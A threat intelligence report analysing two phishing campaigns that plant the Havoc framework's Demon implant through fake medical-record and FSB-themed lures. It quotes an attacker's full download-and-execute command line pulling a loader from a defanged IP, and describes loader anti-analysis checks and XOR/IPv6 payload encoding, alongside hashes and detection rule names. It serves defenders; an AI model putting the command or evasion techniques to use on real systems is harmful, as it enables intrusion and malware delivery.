Wreaking havoc in cyberspace: threat actors experiment with pentest tools

A new research by BI.ZONE Threat Intelligence reveals how adversaries attempt to bypass cybersecurity systems.

In recent months, adversaries have increasingly opted for the Havoc post-exploitation framework. The tool is less popular compared to Cobalt Strike, Metasploit, and Sliver. According to BI.ZONE Threat Intelligence, this C2 framework is employed in an attempt to evade cybersecurity systems that may not flag an unknown program as malicious. For instance, such was the approach of the Mysterious Werewolf cluster that leveraged the Mythic framework in one of its campaigns.

In this research, we explore two campaigns based on the Havoc framework.

Criminals often send out phishing emails on behalf of well-known organizations. To make their messages look plausible and convincing, adversaries eagerly use the names of renowned universities, government regulators, and law enforcement agencies. The names of credible institutions lull the user’s vigilance, prompting them to open malicious emails.

It is important to remember that the organizations whose brands are abused in phishing emails are not liable for the actions of criminals and the associated damage

Key findings

• Adversaries continue to seek alternatives to malware, frequently resorting to post-exploitation frameworks.
• By using lesser known tools, attackers increase their chances of bypassing security systems.
• Phishing emails remain the most popular way of getting initial access as they provide a broader attack surface.

Campaign №1

In July, BI.ZONE Threat Intelligence specialists discovered an archive Выписка амбулаторная Камильская.zip with the ISO file Документы Камильская.iso which in turn contained the LNK file Камильская А. Г.lnk. The names of the archive and its contents suggested that they contained an outpatient medical record and related documents. The opening of the LNK file triggered the execution of the command:

cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe

The said command performed the following actions:

• used cURL to download the decoy document from the server 87.242.107[.]147 and stored it in the compromised system under the name C:\Users\Public\Documents\Vipiska.doc
• used cURL to download OneDriveUpdater.exe from the server 87.242.107[.]147 and stored the executable in the compromised system under the name C:\Users\Public\Downloads\OneDriveUpdater.exe
• ran the downloaded OneDriveUpdater.exe
• opened the decoy Vipiska.doc
• terminated the cmd.exe process with the help of taskkill

The decoy was an outpatient medical record (fig. 1).

Fig. 1. Extract from the decoy

OneDriveUpdater.exe was a PE32 executable written in C# that served as a loader. The file contained an encrypted payload, which it decrypted and ran in memory. Although OneDriveUpdater.exe had a Microsoft OneDrive icon, the file did not have a digital signature.

To prepare and run the malicious payload, the loader used the following WinAPI functions:

• VirtualAllocExNuma to allocate a memory region for the malicious payload
• VirtualProtect to set/modify the protection options for memory regions
• CreateThread to create a thread for execution in the context of the running process

To obstruct analysis, the loader checked:

• code execution time: if the program “slept” less than 2.5 seconds out of 3 seconds (the set sleep value), it terminated
• name of the running process: if the name was other than OneDriveUpdater, the program terminated

The loader contained two types of encrypted malicious payload: x86 and x64. Decrypting the payload required a double XOR with 32-byte keys.

The malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant's configuration data is presented in table 1 below.

Table 1. Description of Demon

We also discovered a similar sample of OneDriveUpdater.exe (SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569) with the identical PDB path. The loader also contained the Demon implant of the Havoc framework. In this case, 87.242.107[.]224 was used as the C2 server.

Our analysis of the C2 servers enabled us to find additional malicious files. We also discovered some previously unknown components of the C2 infrastructure (all the associated indicators of compromise are available on the BI.ZONE Threat Intelligence portal). The files included another decoy document, titled Medical.doc, that was a nearly exact copy of Vipiska.doc (fig.2), which proved that the files had been created by adversaries.

Fig. 2. Decoys compared

Analysis of the metadata suggested that the attackers used data stolen from a medical research center.

Campaign №2

In August, BI.ZONE Threat Intelligence specialists discovered a phishing email (fig. 3).

Fig. 3. Phishing email

A link in the body of the email led to hxxp://inforussia[.]org/dokumenty.html that contained a malicious payload encoded in Base64 (Base64 outcome plus 35) (fig. 4).

Fig. 4. Extract from the HTML page

Clicking the link enabled the malicious payload to be saved in the compromised system as Dokumenty_FSB.exe. Written in C/C++, this PE32+ executable had a PDF icon and served as a loader. Its RCData contained a malicious payload encoded as IPv6 addresses separated by the characters 0D 0A and XOR encrypted with a key of 10,000 bytes. The loader decoded and decrypted the malicious payload in the memory and then ran it via a thread.

Similarly to the previous campaign, the malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant’s configuration data is presented in table 2 below.

Table 2. Description of Demon

Indicators of compromise

Выписка амбулаторная Камильская.zip

• MD5: d970b9e0f46675098dbdd3082565c1c0
• SHA-1: 7388f62e8da9cdbcac4f5bc6b0dc41ff8f0056a9
• SHA-256: 88f83a7394c61b0e05432572ccbbacd1878dad0602c5459f98f46c265e63d8c7

Документы Камильская.iso

• MD5: 3273fb8b07627d8bf5aa4d45aa817ba5
• SHA-1: 14a8c1f7dd2ec5ac1faa8050acbb2fcdf7b8ac8c
• SHA-256: 07ae355ebfafe21d81592b765053c48cf4a079d71b359b6a4d7f412b1dfb6374

Камильская А. Г.lnk

• MD5: ac043785536df294f73f89040d4fc767
• SHA-1: f0f6947cca25f01eda399a7fba1c23e11a0c3a15
• SHA-256: 48a579e8e48938f810fd6568e0d5c8ed6b3ec093f3c76a67f9c494224962a334

OneDriveUpdater.exe

• MD5: 31113f00145ab7d3773884f091407bed
• SHA-1: 061d2d06ce1cabde79ee392645c3568df36fdf17
• SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569

OneDriveUpdater.exe

• MD5: 14fa89384daab27b998d53efc1750a38
• SHA-1: 7f7313d8e9d18823a57ac7a329b9695f6fa7b962
• SHA-256: 7e3928a7f3300aedf261db5596cb7f2f6aac115240b010e25a3d53decde38fd0

dokumenty.html

• MD5: 8a21fe665d3f3a0e44f21e3381da067c
• SHA-1: ad6f413709c9e3af885233822a1aebd779bba7bc
• SHA-256: 7c2f59d9790b816cb6f27a796d7c928046519f7429b7d2bbe53c60a7a55e22a7

Dokumenty_FSB.exe

• MD5: f43dd2463e238ec7af4c63df87db6c73
• SHA-1: bb92e0ca7eda4b866af872a4552e4df42bb28aba
• SHA-256: ac301b7698ac040f219eb8dfb248595a406b075d91f51116ef60d4dd9f5242ad

hxxp://inforussia[.]org

87.242.107[.]147

87.242.107[.]224

46.29.162[.]93

MITRE ATT&CK

Campaign №1

Campaign №2

Detection

The examined malicious activity is detected by the following BI.ZONE EDR rules:

• win_access_to_ti_observed_host_from_nonbrowsers
• win_execution_of_ti_observed_file
• win_curl_download_and_execute_file
• win_kill_cmd_process
• win_suspicious_code_injection_to_system_process
• win_possible_parent_process_spoofing

How to protect your company from such threats

Phishing emails are the most popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

Studying the current attack methods and tools is important for mapping the cyber threat landscape. To stay aware of the latest campaigns and methods used in attacks against specific infrastructures, we recommend dedicated portals such as BI.ZONE Threat Intelligence. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect from the most critical threats to the company.